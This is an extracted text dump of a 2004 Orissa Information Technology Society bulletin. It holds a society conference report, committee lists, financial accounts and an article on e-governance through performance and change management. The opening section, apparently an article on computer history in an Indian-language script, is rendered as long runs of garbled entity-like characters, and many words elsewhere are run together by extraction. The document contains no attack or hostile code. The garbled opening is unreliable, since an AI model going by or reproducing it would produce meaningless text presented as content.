j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 10: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

6

their papers in the different technical sessionsThere was also an industry session with thetheme as India sustaining leadership positionin the global IT market

On 24th afternoon the valedictory functiontook place as the last function of the ConferenceS P Misra President OITS conducted the sameThe program chairs briefly recapitulated thesalient features of the Conference and then asin the last year the results of the two best paperawards were given (i) Amiya K Pujari IT awardof Rs5000- and a certificate for the best paperamong all the papers submitted and presentedin the Conference went to Joydeep Ghosh ofUniversity of Texas Austin USA for the paperentitled A probabilistic approach to privacy-sensitive distributed data mining done incollaboration with Srujana Merigu (ii) NarayanMisra IT award of Rs4000- and a certificatefor the best paper among all the papers submittedfrom Orissa and presented in the Conferencewent to D P Das Silicon Inst of Tech bbsr forthe paper entitled Electricity distribution datamining using soft computing and modifiedwavelet analysis done in collaboration with PK Dash

On 25th December in addition to the threeadvanced tutorials during the Conference sixtutorials were organised two of six hourduration and four of three hour duration atHotel Swosti Plaza All the tutorials wereapproximately with sixty participants each andwere well received

Some more information about theconference can be had from the websiteI Organisation of CITs

In the general body meeting of december23rd 2003 the following observations regardingorganisation of cits were made It was decided

that CIT could be held outside orissa if we findorganiserssponsors However the frequencyof hosting outside orissa can not exceed once inthree years

It was also noted that cit2004 had beendecided by the existing steering committee to beat hyderabad and was appreciated by membersas the exposure of oits members to the IT scenarioin hyderabad will be helpful to take up similaractivities in orissa

Consistent with the spirit of the earlierCITs it was recommended by the general bodythat (i) for academic participants in cit2004 theregistration fees from inside India for academicsbe Rs2000- (ii) oits members as such shall havea discount of 25 and (iii) oits members whodo not have institutional or project support shallhave a discount of 50 subject to their certifyingto that effect

Steering Committee of CITs It was alsofelt desirable that the constitution of the steeringcommittee practised since december 1999 needsto be modified It was thought desirable to havefour permanent members here and some rotatingmembers After some discussions it was thoughtthat the permanent members may be (two fromUSA and two from India)

1 Prasant Mohapatra2 R N Mohapatra (Steering Chair)3 G Panda (NIT rourkela)4 S P Misra

It was also decided that the rotatingmembers of the nth cit shall be the generalchair(s) the program chairs and the organisingchair of the (n-1)th cit along with the incumbentpresident of oits during the period of theconference

Thus the general body resolution ofdecember 1999 now stands replaced by the

OITS-2004

7

above There is an article in the bulletinregarding the progressive evolution of the CITsregarding organisation matters

As is the procedure now these members ofthe steering committee shall seek suggestionsoffers from different mebersinstitutions as theymay think appropriate The steering committeelist shall be intimated to all the oits members assoon as possible

J Executive Committee of OITS

The following are the office bearers in theexecutive committee from 1st april 2004 to 31stMarch 2006 as decided in the general body on23122003

1 President J R Sahu2 Vice-President S Padhy3 Secretary S K Pradhan4 Secretary (overseas) P Mohapatra5 Joint Secretary S K Udgata (Berhampur)6 Joint Secretary B K Patel (Sambalpur)7 Treasurer A K Nayak

In addition the following additionalmembers were also elected to the executivecommittee

S P MisraB Misra (bsnl)A K Panda (ceo elmark)P K Behera (csa uu)S TorasiaS K MohantyA K Das (etdc)Chitta Baral (asu)J R Hota (KIIT Deemed University)

The executive committee as above willoperate from 1st april 2004 till 31st March 2006

K OITS Accounts

There were 48 new life members one donormember one institutional member and one morelife member who registered with the sambalpurchapter The total membership of OITS nowstands at abput 220 NIST conducting cit2001had not returned an advance of Rs20000-given to them they have now returned the samealong with an additional Rs2000- The balancefrom cit2002 amounting to about Rs195000- was a good addition to corpus of funds of oitsof which about Rs2000- was spent for auditingthe accounts of the same We particularlyappreciate the generous assistance of OrissaSociety of Americas of an amoount of aboutRs48600- to oits through personalcontributions Income from IT olympiad roughlybalanced the expenditure in conducting thesame however from OITS funds we have paidabout Rs20000- as prize money which wehope will focus on IT activities for the studentsAlso OITS transferred a sum of about Rs22000- from our corpus of funds to the corpus of fundsof sambalpur and rourkela chapters for openingof the two chapters and we hope the newexecutive committee will do the same forberhampur chapter

The balance with oits at present isRs68888862 of which about Rs636400- iskept in fixed deposits This account along withthe earlier accounts may be seen in appropriateoits website

About the author He is basically a physicist Fiveresearchers working with him have won the prestigiousAlexander von Humboldt fellowship His bookIntroduction to Supersymmetry and Supergravitywas a best seller for more than five years in amazoncomand has been recommended by Prof Witten of Instituteof Advanced Studies Princeton to his researchersNow engaged in organization of OITS

OITS-2004

8

Credit in Rupees Debit in Rupees(a) Brought Forward 41087512 (a) Orissa IT Olympiad Test 3428100(b) Life Members (48) 3110000 (b) Orissa IT Olympiad Prizes 2050000(c) Doner Members 500000 (c) Auditor 216000(d) Institional Members 150000 (d) OITS Bulletin 548000(e) Transfer from SBP chapter 4000 (e) CIT-03 Prizes 900000(f) Return of advance from NIST 2200000 (f) Opening of SBP Chapter 1080000(g) Return of advance from CIT-02 19506250 (g) Opening of RKL Chapter 1121000(h) Orissa IT Olympiad-03 3856800 (h) Contigency 112100(I) Donation from OSA 4863500 (I) Bank Charges 4000(j) Contribution from IDBI agent 150000(k) Bank Interest 2920000

Total 78348062 Total 9459200

Abstract of Accounts of Orissa Information Technology Society (OITS)for the Financial Year 2003-2004

This Consists of

(i) Four fixed depos its of Rs60000- each with deposit numbers IDBI-Suvidha 12500497-00500 Dt 21082003 and 01092003 (ii) One fixed deposit of Rs 300000- with depos it number IDBI-Suvidha 12500563 (iii) One fixed depos it of Rs 37145- with deposit number Syndicate Bank 5908 Dt 23032004 (iv) One fixed depos it of Rs 59288- with depos it number Syndicate Bank 5909 Dt 24032004(b) An effec tive balance in Syndicate Bank account (no 475) Rs 4291162- This includes (i) Rs 800- depos ited by us which is not yet c redited and (ii) Cheques of

(c ) Cash in hand Rs9544-

Postscript On 31st March the cheque of Mr A Patnaik was encashed Further on 3rd april an amount of Rs 9000- has been depos ited tak ing it from copy to (b)

(SP M isra) (A K Nayak)President Treasurer

Rem a rks Besides above an amount of Rs 40000- was given as seed money for CIT 2003 Organised by OITS and S ilicon Ins titute of Technology which is yet to be returned by the organising chair and finance chair CIT 2003

(a) Fixed deposits of Rs636433- with details as below

Rs11210-(oits-rk l13022004ch no 172213) Rs2500-(Bagdebi Panda18012004 ch no 510899) Rs500-(Anurag Patnaik24012004ch no 172205) and Rs 500- (A Agarwal24012004ch no 172207) issued by us which have not been

Thus Ba la nce on 31st Ma rch 2004 is Rs 68888862

OITS-2004

9

A transformation in governments isoccurring worldwide through the use of ICT andacceptance of the Internet and communicationstechnology by various governments for betterCitizens Services Yet there are some lacunae inthe governments internal system architecturefor e-governance services and its applicationsWhat counts is how the government performsits work utilising people business process dataand technology at reduced cost eliminatingbureaucracy and becoming more openresponsive and accountable

A holistic approach is needed for every e-Government initiative and this must includeperformance measurement the right kind ofpolicy alignments training communicationknowledge management and internalorganisational goal changes Governments willprovide more individualised services at less costto its citizens at the right place and the righttime

The one question that arises is what willbe the form of the future government in terms ofdelivery of services and its application tocitizens by using Information CommunicationTechnology How can the government fulfil itsobligations in the best possible way by usingICT for better governance or e-Governance

Three major issues are encountered inproper e-governance initiatives by the

The Transition from Physical Governance toe-Governance

Measurement-based change management systems A model for e-Governance

Use of ICT by the Government to provide better Citizens Centric Services andApplication through performance measurement based on change management in internalorganisational transformation set-up that is called e-Government

Raj Kumar Prasadgovernment to provide Citizen CentricGovernment services Here also services are notwell defined because of the governmentsinternal organisational set up This featureattempts to discover the most challenging linkfor better e-Government initiatives in India Threewords ICT Performance Management andMeasurement and Change Management usedherein are directly linked with the success of e-Government that ultimately ends at e-Democracy To have the maximum ICT outputfor governance we must first understand whatgood governance is all about

Good governance has eight majorcharacteristics It is participatory consensus-oriented accountable transparent responsiveeffective and efficient equitable and inclusiveand follows the rule of law It ensures thatcorruption is minimised the views of minoritiesare taken into account and that the voices of themost helpless in society are heard in decision-making It is also responsive to the present andfuture needs of society

Good governance requires that institutionsand processes try to serve all stakeholders withina reasonable timeframe

It is necessary to analyse two major issuesthat were previously not linked with e-governance Performance Measurement and itsManagement and Change Management We

OITS-2004

10

have considered performance management inrespect of Human Resources presently with thegovernment

What is Performance Management andhow is it linked with Change Management Howcan it be measured We also define the newdefinition of e-governance in respect ofPerformance Measurement and ChangeManagement In a simplistic way PerformanceManagement can be defined as translating plansinto results execution It is also the process ofmanaging strategy for best outcomes and resultsPerformance Management considers asmanageable variable like strategy measuresorganisation charts processes reward incentiveemployee competencies culture andtechnologies

Good performance measures accomplishfour things

Strategise The strategy of organisation shouldbe very clear from the examination of employeeperformance measures

Communicate Performance measurescommunicate albeit different things to differentpeople They show employees at all levels of theorganisation how their jobs fit into the big picture

Figure 2 Characteristics of good governanceSource UN ESCAP

and how they can personally contribute tomission fulfilment and achievement Theyconvey important information to seniormanagers programme managers stakeholdersand the masses

Motivate You need to focus on performancemeasures that will stimulate the necessarybehaviour changes among employees Byinstituting a system of measures that promotestransparency the organisation can motivatebetter performance and guide programmemanagers in their work

Manage Performance measures addressmanagement challenges by illustrating thelinkages between todays activities processesand outputs and the intermediate and endoutcomes of the future Performance measuresshould be relevant to the information needs ofprogramme managers policymakers and thepeople

Why Measure performance What dopeople expect to do with the measures Howare people actually using these performancemeasures What is the rationale that connectsthe measurement of the governmentsperformance to some higher purpose These arethe major issues today There are eight purposesthat public managers have for measuringperformanceThe Purpose - The public Managers questions thatthe performance measures can help answerEvaluate- How well is my public Agency performingControl- How Can I ensure that my subordinate aredoing the right thingsBudget- On what programs peopleor projects shouldmy agency spend the public moneyMotivate-How can motive staff middle managers ngostakeholders and Citizens to do the thing necessary toimprove performancePromote-How can convince political superiorslegislators stakeholders journalists and citizens thatagency is doing good job

OITS-2004

11

Celebrate- what accomplishments are worthy of theimportant organizational ritual of celebrating successLearn-Why is what working or not workingImprove- what exactly should who do differentlyto improve performance

Prof Robert D Behn defined theabovementioned measures in his paper onPublic Administrative Review Journal editionSeptemberOctober 2003 Vol 63 No5 Prof Behnis a Lecturer at Harvard Universitys JF KennedySchool of Government and also a faculty chairof its executive programme Driving GovernmentPerformance

We are convinced about Prof Behns ideaand his paper that we should measureperformance and make every person accountablefor delivery of work in a given timeframe in theDigital Age and for better or good governanceProf Behn mentions that performance measurescould be used for multiple purposes Moreoverdifferent people have different purposes

But we think the ultimate goal ofperformance measurement must relate to thework environment and the work culture in everysegment a government agency NGOstakeholders citizens or corporates All of themmust be accountable for their role and work andthis can be only happen if we make aperformance measurement index in everysegment and link it with Change Management

This issue of Change Management quiterapid at times is a fundamental challenge to beaddressed by the practise of e-Governance Thiswould involve

Delivery of public services like utilitiesrural and urban development schemesthrough EDI Internet and other IT-basedtechnologies that would necessitateprocedural and legal changes in the

decision and delivery-making processes aswell as institutions

Fundamental changes in governmentsdecision management

Changes in decision-making procedures interms of decision-making levels anddelegation of authority

Mandatory changes in legal provisions togive effect to the technology objectives

Accordingly the issues to be addressedrelate to

Mandatory organisational andinstitutional changes affecting both peopleand methods at all interfaces of the DeliveryChain

The need for acceptance of ChangedProcesses to be properly understoodinternalised adopted and improved toenable full advantages of the technologybeing adopted

De-layering of the decision-making levelsleading to re-engineering and appropriatesizing of the decision-making machinery

Training and acclimatisation of personnelat all levels more so at the lower rung ofgovernment management organisations

Prime MinisterChief MinisterLocalRepresentative Political Will PowerLoss of vested interests and assumed

power as well as authority both amongst thelegislature and the executive

We tried to conceptualise this with adiagram In the democratic world citizens electa person who is later termed the peoplesrepresentative or an MLA or MP All previousresearch did not include the peoplesrepresentative because in a democratic set-up

OITS-2004

12

the peoples representatives rule the countrythrough the Legislative Assembly or Lok Sabha(Parliament) and through the making of peopleor business-friendly laws and citizen-relatedschemes For the first time we tried to link thesepeople because political motivation is imperativefor the e-governance drive in India or anywhereelse in the world All people are directlyconnected with their representative as well as

administration for day-to-day governmentservices or work In this diagram both thepolitical level and administrative level are linkedwith citizens

In the abovementioned concept keeping inmind the reality of a democratic country andPerformance Management and Change Managementwe tried to bring in a new definition for e-Government

Performance Measurement of Government workforce

Change Management

Prime MinisterChief MinisterLocal Representative

Political Will Power

Efficiency in Government

Citizens Confidence in Government for

Better

Better Citizens Services through ICT-e-Government

e-Governance

Administrator

People willChange The Representativeif they do not perform

Citizens Confidence inGovernment for Better

Governance

OITS-2004

13

that is Use of ICT by the Government to providebetter Citizens Centric Services and Applicationthrough performance measurement based onchange management in internal organisationaltransformation set-up that is called e-Government

In other words e-Governance should belinked with the empowerment of everystakeholder along with the economicdevelopment of the country

There are other major issues too Ananalysis of the determinants of successful e-Government programmes shows that the keyfactors are the countries political will thestrength of their human capital theirtelecommunications infrastructure and thepresence of administrative priorities

The United Nations Report develops andpresents a synthetic e-Government index thatreflects and incorporates the countries officialonline presence evaluates theirtelecommunications infrastructure and assessestheir human development capacity In essencethe index reflects the requisite conditions that

constitute an enabling environment for e-Government

Multidimensional approach should beapplied for this kind of initiative that leads toreforms issues e-Government is considered aglobal change programme towards a custom-oriented governmental organisation Atransition of this importance needs clear visionand leadership A recent study on benchmarkingon e-Government projects done by CGEampY hasshown that different kind of e-Governmentprojects in the EU have been translated intomodels with important enablers for the furtherdevelopment of e-Government

These enablers are clustered into thefollowing categories

middot Leadershipmiddot Organisationmiddot Culturemiddot TechnologyA successful e-Government strategy should

contain all elements of the model in a balancedway

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

OITS-2004

14

Enablers for Further e-GovernmentDevelopment

What kind of citizens services are neededmust first be analysed by the government so thataccording to requirements the governmentprovides services at minimum cost with nohassle through proper use of ICT This is thefirst step of e-Governance Government shouldstart performance-based change management inthe internal system for better efficiency andreliability to provide much-needed e-Government services in a manner that isaccountable Goals should be defined first andpriorities should be taken in account

Basic citizens services are considered firstbefore any e-Governance initiative and these canbe centralised with the department and availableonline for citizens and business peopleCitizens BusinessesIncome Taxes Social Contribution

for EmployeesJob Search Corporate TaxSocial Security Benefits VATPersonal Documents Registration of a New

CompanyCar Registration Submission of Data to the

Statistical OfficeApplication for Building Custom DeclarationPermission Declaration to Police Environment-related

PermitsPublic Libraries Public ProcurementBirth and MarriageCertificates Enrolment in HigherEducationAnnouncement of Moving Health-related Services

Sources CAP GEMINI Ernst amp Youngs Onlineavailability of public services Oct 2001Oct 2002

The recent study report by PACIFICCOUNCIL ON INTERNATIONAL POLICYRoadmap for E-Government in the DevelopingWorld has shown that the spread of informationand communication technology brings hope that

